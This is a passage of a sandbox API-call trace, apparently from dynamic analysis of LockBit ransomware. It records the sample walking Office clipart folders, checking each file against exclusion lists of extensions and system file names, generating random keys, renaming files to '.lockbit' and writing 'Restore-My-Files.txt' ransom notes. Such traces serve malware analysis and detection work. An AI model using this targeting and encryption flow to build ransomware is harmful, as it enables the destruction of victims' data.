0x1fa2ed8 [0180.363] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0180.363] free (_Block=0x1fa2ed8) [0180.364] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01294_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0180.364] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0180.364] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0180.364] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3725d200, ftCreationTime.dwHighDateTime=0x1bd4e69, ftLastAccessTime.dwLowDateTime=0x5e574fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3725d200, ftLastWriteTime.dwHighDateTime=0x1bd4e69, nFileSizeHigh=0x0, nFileSizeLow=0x161, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01295_.GIF", cAlternateFileName="")) returned 1 [0180.364] lstrcmpiW (lpString1=".", lpString2="WB01295_.GIF") returned -1 [0180.364] lstrcmpiW (lpString1="..", lpString2="WB01295_.GIF") returned -1 [0180.364] PathFindExtensionW (pszPath="WB01295_.GIF") returned=".GIF" [0180.364] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0180.364] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0180.364] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0180.364] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0180.364] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0180.364] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0180.364] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0180.364] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0180.364] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0180.364] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0180.364] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0180.364] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0180.364] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0180.364] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0180.364] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0180.364] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0180.364] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0180.364] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0180.364] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0180.364] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0180.364] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0180.364] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0180.365] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0180.365] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0180.365] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.365] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0180.365] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0180.365] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0180.365] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0180.365] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0180.365] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0180.365] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0180.365] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0180.365] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0180.365] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0180.365] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0180.365] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0180.365] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0180.365] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0180.365] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0180.365] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0180.365] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0180.365] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.365] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0180.365] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0180.365] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0180.365] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0180.365] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01295_.GIF") returned -1 [0180.365] lstrcmpiW (lpString1="ntldr", lpString2="WB01295_.GIF") returned -1 [0180.365] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01295_.GIF") returned -1 [0180.365] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01295_.GIF") returned -1 [0180.365] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01295_.GIF") returned -1 [0180.365] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01295_.GIF") returned -1 [0180.365] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01295_.GIF") returned -1 [0180.366] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0180.366] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01295_.GIF") returned=".GIF" [0180.366] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0180.366] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0180.366] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0180.366] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0180.366] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0180.366] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0180.366] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0180.366] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0180.366] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0180.366] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0180.366] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0180.366] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0180.366] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0180.366] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0180.366] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0180.366] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0180.366] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0180.366] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0180.366] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0180.366] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0180.366] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0180.366] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0180.366] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0180.366] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0180.366] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0180.366] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0180.366] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0180.366] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0180.366] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01295_.GIF.lockbit") returned 72 [0180.366] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01295_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01295_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0180.368] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0180.368] malloc (_Size=0x40068) returned 0x3df0008 [0180.368] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=353) returned 1 [0180.368] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.368] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0180.368] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.369] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0180.369] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0180.372] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01295_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01295_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0180.372] malloc (_Size=0xa6) returned 0x1fa2ed8 [0180.372] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0180.372] free (_Block=0x1fa2ed8) [0180.372] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01295_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0180.372] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0180.372] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0180.372] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x997dd300, ftCreationTime.dwHighDateTime=0x1bd4e67, ftLastAccessTime.dwLowDateTime=0x70875130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x997dd300, ftLastWriteTime.dwHighDateTime=0x1bd4e67, nFileSizeHigh=0x0, nFileSizeLow=0x1ef, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01296_.GIF", cAlternateFileName="")) returned 1 [0180.372] lstrcmpiW (lpString1=".", lpString2="WB01296_.GIF") returned -1 [0180.372] lstrcmpiW (lpString1="..", lpString2="WB01296_.GIF") returned -1 [0180.372] PathFindExtensionW (pszPath="WB01296_.GIF") returned=".GIF" [0180.373] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0180.373] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0180.373] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0180.373] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0180.373] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0180.373] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0180.373] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0180.373] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0180.373] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0180.373] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0180.373] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0180.373] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0180.373] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0180.373] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0180.373] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0180.373] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0180.373] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0180.373] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0180.373] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0180.373] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0180.373] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0180.373] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0180.373] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0180.373] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0180.373] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.373] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0180.373] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0180.373] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0180.373] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0180.373] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0180.374] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0180.374] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0180.374] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0180.374] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0180.374] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0180.374] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0180.374] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0180.374] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0180.374] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0180.374] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0180.374] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0180.374] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0180.374] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.374] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0180.374] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0180.374] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0180.374] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0180.374] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01296_.GIF") returned -1 [0180.374] lstrcmpiW (lpString1="ntldr", lpString2="WB01296_.GIF") returned -1 [0180.374] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01296_.GIF") returned -1 [0180.374] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01296_.GIF") returned -1 [0180.374] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01296_.GIF") returned -1 [0180.374] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01296_.GIF") returned -1 [0180.374] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01296_.GIF") returned -1 [0180.374] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0180.374] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01296_.GIF") returned=".GIF" [0180.374] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0180.374] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0180.374] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0180.374] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0180.374] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0180.375] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0180.375] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0180.375] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0180.375] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0180.375] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0180.375] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0180.375] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0180.375] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0180.375] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0180.375] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0180.375] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0180.375] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0180.375] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0180.375] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0180.375] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0180.375] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0180.375] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0180.375] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0180.375] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0180.375] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0180.375] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0180.375] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0180.375] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0180.375] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01296_.GIF.lockbit") returned 72 [0180.375] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01296_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01296_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0180.377] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0180.377] malloc (_Size=0x40068) returned 0x3df0008 [0180.377] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=495) returned 1 [0180.377] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.377] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.377] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0180.377] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.378] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0180.378] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0180.381] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01296_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01296_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0180.381] malloc (_Size=0xa6) returned 0x1fa2ed8 [0180.381] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0180.381] free (_Block=0x1fa2ed8) [0180.381] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01296_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0180.381] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0180.381] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0180.382] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9387f200, ftCreationTime.dwHighDateTime=0x1bd4e67, ftLastAccessTime.dwLowDateTime=0x5e574fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9387f200, ftLastWriteTime.dwHighDateTime=0x1bd4e67, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01297_.GIF", cAlternateFileName="")) returned 1 [0180.382] lstrcmpiW (lpString1=".", lpString2="WB01297_.GIF") returned -1 [0180.382] lstrcmpiW (lpString1="..", lpString2="WB01297_.GIF") returned -1 [0180.382] PathFindExtensionW (pszPath="WB01297_.GIF") returned=".GIF" [0180.382] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0180.382] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0180.382] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0180.382] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0180.382] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0180.382] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0180.382] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0180.382] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0180.382] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0180.382] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0180.382] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0180.382] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0180.382] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0180.382] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0180.382] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0180.382] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0180.382] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0180.382] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0180.382] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0180.382] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0180.382] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0180.382] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0180.382] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0180.382] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0180.382] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.382] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0180.383] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0180.383] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0180.383] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0180.383] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0180.383] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0180.383] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0180.383] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0180.383] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0180.383] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0180.383] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0180.383] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0180.383] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0180.383] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0180.383] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0180.383] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0180.383] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0180.383] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.383] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0180.383] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0180.383] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0180.383] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0180.383] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01297_.GIF") returned -1 [0180.383] lstrcmpiW (lpString1="ntldr", lpString2="WB01297_.GIF") returned -1 [0180.383] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01297_.GIF") returned -1 [0180.383] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01297_.GIF") returned -1 [0180.383] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01297_.GIF") returned -1 [0180.383] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01297_.GIF") returned -1 [0180.383] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01297_.GIF") returned -1 [0180.383] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0180.383] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01297_.GIF") returned=".GIF" [0180.383] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0180.384] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0180.384] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0180.384] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 